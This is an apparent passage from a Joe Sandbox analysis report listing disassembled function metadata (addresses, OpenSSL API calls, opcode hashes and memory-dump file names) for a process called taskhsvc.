                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 1e63d9b8a8fd6da2865a29af59abe79322c9407483965b52e1a7a2e76049b661
                                                            • Instruction ID: c979739c8a456843aa9b368a56e0b0e077decb257e9731becd5fa6f331e0f07c
                                                            • Opcode Fuzzy Hash: 1e63d9b8a8fd6da2865a29af59abe79322c9407483965b52e1a7a2e76049b661
                                                            • Instruction Fuzzy Hash: D8810931504A009FDF20EF79D64064BB7F1AB8A318F13DA1DD668DB204D731B9068FAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE44DB0 Relevance: 28.5, APIs: 15, Strings: 1, Instructions: 476COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: S_encrypt1__stack_chk_fail
                                                            • String ID: v
                                                            • API String ID: 2067885017-1801730948
                                                            • Opcode ID: 6d097e046239619762b3683a7f1e3f2132097484b9f2dc8cec2de3a0b5fc4bb4
                                                            • Instruction ID: 8e6e8b21fcbef1613cef59e228bde8d4f7377b2f68ed3d89ac2582a97f1cb6bc
                                                            • Opcode Fuzzy Hash: 6d097e046239619762b3683a7f1e3f2132097484b9f2dc8cec2de3a0b5fc4bb4
                                                            • Instruction Fuzzy Hash: 5512F2756097418FC720CF29C580A4BFBF5BFDA208F55896DEA989B311D330E905CBA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEBEE60 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 207COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: C$j
                                                            • API String ID: 4216919130-3507651435
                                                            • Opcode ID: 1cda71d1aedfac592151a20650ade077c0d0394394458fb651649f6c510ecda7
                                                            • Instruction ID: 1cb37d6e703ea05bc2e87f886f32fa8b37049d09c123c70e8dd21df4861da033
                                                            • Opcode Fuzzy Hash: 1cda71d1aedfac592151a20650ade077c0d0394394458fb651649f6c510ecda7
                                                            • Instruction Fuzzy Hash: AB91E7795187409FDB10DF69C680A5BBBF1FB89318F12891CEAA8A7310D335E905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEBCC70 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 134stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$O_lock$strcmp
                                                            • String ID: C$g$x${${
                                                            • API String ID: 107333257-644820815
                                                            • Opcode ID: 1cd9c55046383a13943eea091d77dbeb6e9986e8c5fc0c2ab5bdbc70487ddb02
                                                            • Instruction ID: d2174e16bd1336493e53c66cbfcf115fcda5033d666178f12a65728417429988
                                                            • Opcode Fuzzy Hash: 1cd9c55046383a13943eea091d77dbeb6e9986e8c5fc0c2ab5bdbc70487ddb02
                                                            • Instruction Fuzzy Hash: AC5126B560C342DBE700EF66D14436ABBF0BB81348F21891DE5A85BB50C7B9A549CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CED4440 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_s_file
                                                            • String ID:
                                                            • API String ID: 3660339215-0
                                                            • Opcode ID: 4be1e2749e92da420e3a34365106736ed413088142cdb0356caa2ce6b9823ced
                                                            • Instruction ID: 38cdd541b3a0b70c18240205be850bb8a704d5910faff9cc79baf2a64462eb12
                                                            • Opcode Fuzzy Hash: 4be1e2749e92da420e3a34365106736ed413088142cdb0356caa2ce6b9823ced
                                                            • Instruction Fuzzy Hash: 3D6159B16087018FD710DF29C58069BBBF1FF85358F22C92EE5A88B700D731E9168B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE9ED80 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_nid2objX509_i2d_
                                                            • String ID: f$u$u
                                                            • API String ID: 2794517210-2092794679
                                                            • Opcode ID: fc71b548b41bcdfd96eebec6491b07a185acdfae8b5f6c6918beefdee376d3ef
                                                            • Instruction ID: e25dd6eb408f8dca402ae00d103788641d585f9f9a44c1866bca111c8881d9ac
                                                            • Opcode Fuzzy Hash: fc71b548b41bcdfd96eebec6491b07a185acdfae8b5f6c6918beefdee376d3ef
                                                            • Instruction Fuzzy Hash: C051DDB05097019FD350DF29C19475BBBF4BF89748F20882EE9998B750E779A848CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3AF60 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • X509_VERIFY_PARAM_new.LIBEAY32 ref: 6CF3B010
                                                              • Part of subcall function 6CF46510: CRYPTO_malloc.LIBEAY32 ref: 6CF46539
                                                              • Part of subcall function 6CF46510: CRYPTO_malloc.LIBEAY32 ref: 6CF46582
                                                              • Part of subcall function 6CF46510: sk_pop_free.LIBEAY32 ref: 6CF46605
                                                              • Part of subcall function 6CF46510: sk_pop_free.LIBEAY32 ref: 6CF46625
                                                              • Part of subcall function 6CF46510: CRYPTO_free.LIBEAY32 ref: 6CF4663A
                                                              • Part of subcall function 6CF46510: CRYPTO_free.LIBEAY32 ref: 6CF46650
                                                              • Part of subcall function 6CF46510: CRYPTO_free.LIBEAY32 ref: 6CF4666D
                                                            • X509_policy_tree_free.LIBEAY32 ref: 6CF3B0AD
                                                            • sk_pop_free.LIBEAY32 ref: 6CF3B0CB
                                                            • CRYPTO_free_ex_data.LIBEAY32 ref: 6CF3B0E6
                                                            • ERR_put_error.LIBEAY32 ref: 6CF3B072
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • X509_VERIFY_PARAM_inherit.LIBEAY32 ref: 6CF3B032
                                                              • Part of subcall function 6CF466E0: sk_pop_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF467A6
                                                              • Part of subcall function 6CF466E0: sk_new_null.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF467B3
                                                              • Part of subcall function 6CF466E0: sk_num.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF46809
                                                              • Part of subcall function 6CF466E0: sk_pop_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF46843
                                                              • Part of subcall function 6CF466E0: sk_deep_copy.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF4686F
                                                            • X509_VERIFY_PARAM_lookup.LIBEAY32 ref: 6CF3B132
                                                            • X509_VERIFY_PARAM_inherit.LIBEAY32 ref: 6CF3B141
                                                            • ERR_put_error.LIBEAY32 ref: 6CF3B1F7
                                                            • X509_VERIFY_PARAM_free.LIBEAY32 ref: 6CF3B213
                                                            • X509_VERIFY_PARAM_lookup.LIBEAY32 ref: 6CF3B229
                                                            • X509_VERIFY_PARAM_inherit.LIBEAY32 ref: 6CF3B238
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X509_$sk_pop_free$M_inheritO_free$M_lookupO_mallocR_put_error$M_freeM_newO_free_ex_dataR_get_stateX509_policy_tree_freesk_deep_copysk_new_nullsk_num
                                                            • String ID: A$A
                                                            • API String ID: 2267118288-2116726341
                                                            • Opcode ID: 567fee929aca5ecd84857c7e7a1eb3914da835ed2a0d176510df3b16bbaac151
                                                            • Instruction ID: 126442d4f24c0c99af3ab68831e2dc79c31171a737f564d5a0e20db99abbdec3
                                                            • Opcode Fuzzy Hash: 567fee929aca5ecd84857c7e7a1eb3914da835ed2a0d176510df3b16bbaac151
                                                            • Instruction Fuzzy Hash: 6B91F0B0609B11DBEB50CF29C1A431BBBE4BF44308F119A5DD8988FA4AD779D444CBD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF1AD30 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
